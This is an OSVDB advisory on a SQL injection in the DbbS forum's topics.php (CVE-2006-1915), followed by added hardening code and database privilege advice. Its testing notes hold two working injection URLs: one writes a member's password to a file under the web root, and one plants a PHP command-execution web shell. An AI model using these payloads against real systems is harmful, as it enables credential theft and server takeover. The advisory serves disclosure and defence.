DbbS topics.php fcategoryid Variable SQL Injection

2006-04-16T03:03:42
ID OSVDB:24957
Type osvdb
Reporter OSVDB
Modified 2006-04-16T03:03:42

Description

Manual Testing Notes

http://[target]/DbbS/topics.php?fcategoryid=-999'%20UNION%20SELECT%20null,pass%20INTO%20DUMPFILE'c:\inetpub\wwwroot\dbbs\test.txt'%20FROM%20forum_membres%20WHERE%20id='1'/
http://[target]/DbbS/topics.php?fcategoryid=-999'%20UNION%20SELECT%20null,'<?php%20passthru($_GET[cmd]);?>'%20INTO%20DUMPFILE'c:\inetpub\wwwroot\dbbs\suntzu.php'%20FROM%20forum_categories/
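
The testing notes show the two properties that make this finding serious: the fcategoryid value is placed into the query as a string without validation, and the database account has enough privilege for SELECT ... INTO DUMPFILE to write files under the web root. The following is an added example, not DbbS code, of how a topics.php handler would close the first gap. It assumes a mysqli connection $db with mysqlnd available (for get_result), and a forum_categories table with an integer primary key id and a name column; only the table name appears in the advisory, the column names are assumptions.

```php
<?php
// Added example (not DbbS code): hardened handling of the fcategoryid
// parameter. Assumes a mysqli connection $db and a forum_categories table
// with integer column `id` and text column `name` (column names assumed).

function load_category(mysqli $db, $raw_category_id): ?array
{
    // 1. Accept only a plain positive decimal integer. Input such as
    //    "-999'..." fails validation and never reaches the database.
    $category_id = filter_var(
        $raw_category_id,
        FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1]]
    );
    if ($category_id === false) {
        return null; // caller responds 400/404; no query is issued
    }

    // 2. Bind the value instead of concatenating it. The statement text
    //    is fixed, so a quote cannot close a literal and a UNION cannot be
    //    appended to the query.
    $stmt = $db->prepare('SELECT id, name FROM forum_categories WHERE id = ?');
    $stmt->bind_param('i', $category_id);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();

    return $row ?: null;
}

// Usage inside topics.php (assumed entry point):
// $category = load_category($db, $_GET['fcategoryid'] ?? '');
// if ($category === null) { http_response_code(404); exit; }
```

The second gap is a privilege one: INTO DUMPFILE only succeeds when the MySQL account holds the FILE privilege, and MySQL's secure_file_priv setting further restricts where such files may be written. Running the forum under an account without FILE, and with secure_file_priv pointing away from the web root, means that even a reachable injection cannot drop a script into the document root as the second test URL does.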

References:

Vendor URL: http://www.dbbs.sup.fr/
Related OSVDB ID: 24956
Related OSVDB ID: 24958
Related OSVDB ID: 24955
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-04/0327.html
CVE-2006-1915